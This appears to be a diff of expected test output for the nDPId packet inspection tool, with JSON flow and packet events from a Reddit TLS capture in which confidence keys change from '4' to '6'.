00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1605291686099,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686099,"pkt":"qtsDr8lk5EKm5WPyht1gBKPwACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3P4Bu+9x1NeMsOPUgBAB+4AOAAABAQgKqXTmJ8LXOMU="} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdBugO8IeJd6tioBJXgCN0AAACBAV4AQMDAwQCCArC1zjGqXTmBA=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdBGVsk6UAYN+NoBJXgFfrAAACBAV4AQMDAwQCCArC1zjGqXTmAA=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdCGPwRcUBxWYioBJXgB9GAAACBAV4AQMDAwQCCArC1zjGqXTmBA=="} @@ -93,58 +93,58 @@ 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1605291686100,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686100,"pkt":"qtsDr8lk5EKm5WPyht1gAj4aACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QgBuwHFZiJj8EXGgBAB+6MzAAABAQgKqXTmKMLXOMY="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdCnzgy8YZci18oBJXgKFLAAACBAV4AQMDAwQCCArC1zjGqXTmBA=="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1605291686100,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686100,"pkt":"qtsDr8lk5EKm5WPyht1gCQMdACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QoBuxlyLXx84MvHgBAB+yU5AAABAQgKqXTmKMLXOMY="} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686101,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686101,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686101,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686101,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1605291686102,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686102,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdDA6Vo\/hs46MGoBJXgG5nAAACBAV4AQMDAwQCCArC1zjGqXTmBA=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1605291686102,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686102,"pkt":"qtsDr8lk5EKm5WPyht1gBZ0wACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QwBu2zjowYOlaP5gBAB+\/JSAAABAQgKqXTmKsLXOMY="} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":468,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686103,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686103,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":470,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686035,"flow_last_seen":1605291686105,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686105,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":475,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686106,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686106,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} -01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":490,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686110,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686110,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01281{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":492,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686035,"flow_last_seen":1605291686110,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686110,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} -01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":498,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686127,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686127,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":501,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 